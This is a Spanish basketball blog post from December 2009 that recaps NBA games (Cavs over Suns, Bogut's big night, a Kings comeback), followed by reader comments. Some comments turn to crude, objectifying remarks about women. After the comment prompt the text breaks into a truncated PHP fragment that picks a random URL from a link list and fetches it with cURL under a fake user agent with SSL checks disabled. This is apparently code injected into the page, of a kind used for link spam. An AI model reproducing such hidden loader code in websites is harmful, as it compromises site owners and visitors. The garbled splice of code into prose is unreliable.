La Crónica (21/12/2009)

22 de December de 2009 por TheDeerHunter

Golpe de mano del Este sobre el Oeste.

Los Cavs profanaron el, hasta anoche, inexpugnable bastión del Airways Center de Phoenix. Si los Cavs aciertan en el tiro exterior y son capaces de correr estás acabado. El perímetro foráneo, con Sweet Mo y West destacados, asfixiaron en ambos lados de la cancha a los Suns, con muchas pérdidas y bajos porcentajes de tiro. La receta más idónea para que LeBron y sus “escuderos” te pasen por encima.

Además, los Magic superaron con cierta solvencia, el siempre complicado trago que supone un duelo contra los Jazz. Doble alegría con la vuelta de Nelson, veremos cuanto les dura. Jugaron bien, con un buen Rashard Lewis y un estratosférico Redick. El reparto de minutos y de tiros sigue y seguirá siendo un quebradero de cabeza para Van Gundy.

En Indiana los Bucks recuperaron parte de su crédito, de la mano de un Andrew Bogut imparable y también de la mano de un TJ Ford al que deberían prohibirle decidir partidos. Por último, esperando no dejarnos a ninguno, los Clippers no fueron rival para los Spurs y Duncan aprovechó para dormitar por primera vez en toda la campaña.

Del resto de partidos destaca la victoria de los Kings sobre los Bulls, remontando ni más ni menos que 35 puntos de ventaja en la segunda parte que ni Westphal se la creía. Rose y Deng representaron la debacle en sus propias carnes, jugando muy bien al inicio pero hundiéndose hasta el ridículo en el último cuarto. Sergio jugó estupendamente los 20 minutitos que disfrutó, pero la victoria la cimentó el de siempre (Tyreke) bien secundado por Udrih y Udoka.

PREMIOS:

MVP: Extraordinario partido de Andrew Bogut sobre Roy Hibbert. Hizo 31 puntos, 18 rebotes, 3 tapones, 3 asistencias y 1 robo. La tríada Mourice Williams – Delonte West – LeBron James también fue fundamental para la primera derrota de los Suns en casa.

El Rookie: Tyler Hansbrough aprovechó bien sus 20 minutitos de juego, como Taj Gibson en los Bulls. Jennings también estuvo correcto aunque fallón… todos terminaron en derrota. El mejor de la noche: El amo de los rookies… Tyreke Evans liderando a su equipo en una remontada épica. ¿Será verdad que puede ser “un nuevo Wade”?

La sorpresa: Hablamos poco de él, pero J.J. Redick viene haciendo una más que interesante temporada. Anoche acribilló a los Jazz con 20 puntos casi sin fallo.

La decepción: No podremos incluirlos en el “mayor esfuerzo en vano” porque la segunda parte que se marcaron Rose&Deng es para pasarlos a cuchillo.

El mayor esfuerzo en vano: Kaman se marcó un 23-15 y mantuvo bien controlado a su par. Sus compañeros no pueden decir lo mismo y por eso la derrota fue inapelable.

RAZONES PARA TRASNOCHAR:

No habrá menú de delicatessen la próxima madrugada. Podríamos destacar el a priori igualado Detroit@Charlotte a la 1 a.m. o los quebraderos de cabeza que siempre le dan los Pacers a los Celtics (a la 1:30h) En el Oeste también hay algún duelo salvable. La visita de los Clippers a Houston, el “apasionante” duelo entre McMillan y Carlisle (ambos choques a las 02:30h) o la peligrosa visita de los Thunder a L.A. (este sí a las 4:30h)

Comenta

20 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Partidazo de Bogut que es un jugador que me encantó en su etapa universitaria y me ha decepcionado hasta el momento en la NBA. Seguro que no tardamos en verle un partido con un 5 de 17 en tiros y 5 rebotes.

    Y Redick lo normal dandole minutos es que rinda, porque es muy bueno.

      Citar

  2. TheDeerHunter dice:
    #2

    Las espectativas eran muy altas, claro… pero al menos este año yo creo que nadie se puede quejar de su nivel.
    Lo de Jennings es muy bonito y tal, pero quien está fijando el nivel de los Bucks este año es él sin ninguna duda.

      Citar

  3. Kantonyo dice:
    #3

    Si me dicen a principio de temporada el rendimiento que Sacramento esta ofreciendo, me hubiera sorprendido igual que si alguien me dice hoy que acabaran campeones…. un 10 para Westphal

      Citar

  4. sergio dice:
    #4

    ¿Quien sorprende mas este año: Grizzlies, Milwaukee o Kings?

      Citar

  5. telekoman dice:
    #5

    El nivel de los Bucks evidentemente lo está dando Jennings, pero no hay que dejar de lado a Ilyasova, creo yo. De hecho, veremos que es lo que pasa cuando a Jennings dejen de entrarle las mandarinas que a veces se tira.

    Para mi gusto sorprende más Grizzlies. Parece que están consiguiendo ser un equipo de vez en cuando, y creo que ninguno de nosotros apostabamos por eso al principio de la temporada.

      Citar

  6. Chris dice:
    #6

    Para mi el equipo revelación se lo llevan los Kings. aquella banda (aún más banda que los bulls) en la que segun Nocioni había acabado el año pasado se ha convertido en un equipo eléctrico con capacidad para hacer cosas como las de anoche. Tyreke tiene gran parte de culpa, un jugadorazo que tiene todos los números para ser ROY, pero la labor de Wesphal se está notando y mucho está sabiendo combinar todo lo que tiene y ponerlo en cancha en el momento preciso. Y sin Martin ni Garcia en este primer tramo de RS. Y además esta el tema de Sergio que por fin parece haber encontrando su sitio en la liga y está dando muy buenos minutos.

      Citar

  7. Love Denise dice:
    #7

    A mí los que más me sorprenden son los Kings, los Grizzlies desde la salida de Iverson lo están haciendo muy bien, pero sobre Mayo, Gasol, Randolph y Gay todos sabiamos que tenían calidad, sólo hacía falta (que no era tarea fácil) que pusieran su calidad a disposición del colectivo. Sobre los Bucks, pienso que se van a desinflar a medida que pasa la temporada, aunque al jugar en el mediocre Este, dónde sólo se pueden destacar 4 equipos, no sería extraño que se clasificasen para PO.
    Hablando de Memphis, el mediocre Jaric ha fichado por el Real Madrid, lo que no sé es para qué. Creo que todos los bases y escoltas que tiene Messina son actualmente mejores que el serbio. Por cierto, su mujer es guapa pero no para tanto, super sobrevalorada en el mundo del modelaje.

      Citar

  8. HeiNeKeN dice:
    #8

    Me sorprenden mas los Kings… y creo que deberian traspasar a Kevin Martin, porque no estoy seguro de que cuando vuelva sea positivo para ellos, aunque vuelva a sus medias de veintitantos puntos por partido.

      Citar

  9. Viva_Dirk dice:
    #9

    Deer, yo no me quejo de su nivel ‘general’, lo que digo es que no acaba de ser un jugador consistente, tiene demasiados partidos en los que no actua como un center ni aprovecha sus enormes cualidades.

      Citar

  10. Txusma dice:
    #10

    Supongo q en el fichaje de Jaric habra influido bastante la lesión de Llull que tiene para cosa de un mes

      Citar

  11. sergio dice:
    #11

    Eso si que no. No estoy dispuesto a que os metais con Adriana Lima. Puedo soportar lo de Iverson, que me quiteis preguntas del trivial, que seais fans de McMillan, pero no me digais que no tiene ganao el pan la muchacha!!!!

      Citar

  12. TheDeerHunter dice:
    #12

    jojojo, pues a él se le ve bastante contento:
    http://www.starsjournal.com/wp-content/uploads/2009/05/adriana-lima-marko-jaric.jpg

    (ahora entiendo que consideres a Iverson sobrevalorado, LD)

      Citar

  13. Love Denise dice:
    #13

    jejej
    Si me permitís un sólo comentario sobre mujeres
    Adriana Lima está bien pero no para tanto, yo no cambiaría a mi novia por ella (y que conste que mi novia es una chica del montón.) A. Lima está mejor que la media, ahora si la comparas con otras modelos, Adriana Lima es un ogro¡¡¡¡¡. Para ver mujeres impresionantes de verdad y naturales, googlea la infravalorada y poco conocida glamour model checa Denise Milani, o las británicas Lucy Pinder y Jordan Carver. Al lado de éstas, Adriana Lima y Gisele Bundchen son, como diría el comentarista Maldini, BACALÁ.

    Pido perdon si algún lector y/o realizador del blog se siente ofendido por utilizar este espacio para hablar de mujeres y no de baloncesto, no lo haré más.

      Citar

  14. Txusma dice:
    #14

    El último, el último… Denise, no conocia a las 3 mujeres que has nombrado pero veo que todas tienen 2 cosas en común. Cuestión de gustos?

      Citar

  15. TheDeerHunter dice:
    #15

    jajajajajja vaya peasso de…
    Creo que estamos hablando de perfiles (nunca mejor dicho) de mujer muy distintos… pero están muy bien tus propuestas. Implícitamente ¿no querrás decir que cambiarías a tu novia por una (o dos) de estas??? que no te oiga ella…
    Yo no cambiaría a mi novia por ninguna (jeee) pero siendo soltero me montaría un fiestón con las 5 que pa qué…

    En este blog casi todos hemos bebido de la pareja Montes-Daimiel… faltaría más que no se pudiera hablar de temas distintos al baloncesto aquí.

      Citar

  16. Love Denise dice:
    #16

    Hombre, siendo sincero, SÍ cambiaría a mi novia por mi querida Denise (pero no por la Lima). Las 3 que he nombrado no son simplemente tías con pechos grandes, sino que son pechos naturales, y además son guapísimas de cara y cuerpazo, y tristemente infravaloradas. Es verdad que para gustos los colores, y que la belleza es subjetiva, pero no creo que ya un sólo hombre heterosexual en la Tierra que no quisiese poseer a alguna de las que nombré.
    Un fieston con las 5? Pues sí, pero con una me conformo, lo firmaría ahora mismo.
    Tranquilo, mi novia no leerá esto, je je je

      Citar

  17. sergio dice:
    #17

    Me sigo quedando con la Lima. A mi todo lo que lleve citricos me gusta mas… valoro mucho tus aportaciones Denise pero presiento que los 2 motivos tenderan a parecer problemas en un futuro para ella…. Pa gustos colores.. lo dicho

      Citar

  18. Viva_Dirk dice:
    #18

    Estoy 100% deacuerdo con Denise, su favorita es también una de las mias. Dejo una aportación: Meagan Good.

      Citar

  19. sergio dice:
    #19

    Dirk empresario del año!! Vaya as tenias debajo de la manga…. mucho mejor que Budinger y Blair juntos oye…..

      Citar

  20. Love Denise dice:
    #20

    No está nada mal la que ha nombrado Dirk, pero donde esté mi bella morava Denise, que se quiten las demás. ¡¡Qué calidad tienen los checos en las pelotas!!, un país tan pequeño, y la cantidad de mujeronas que aporta a la humanidad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>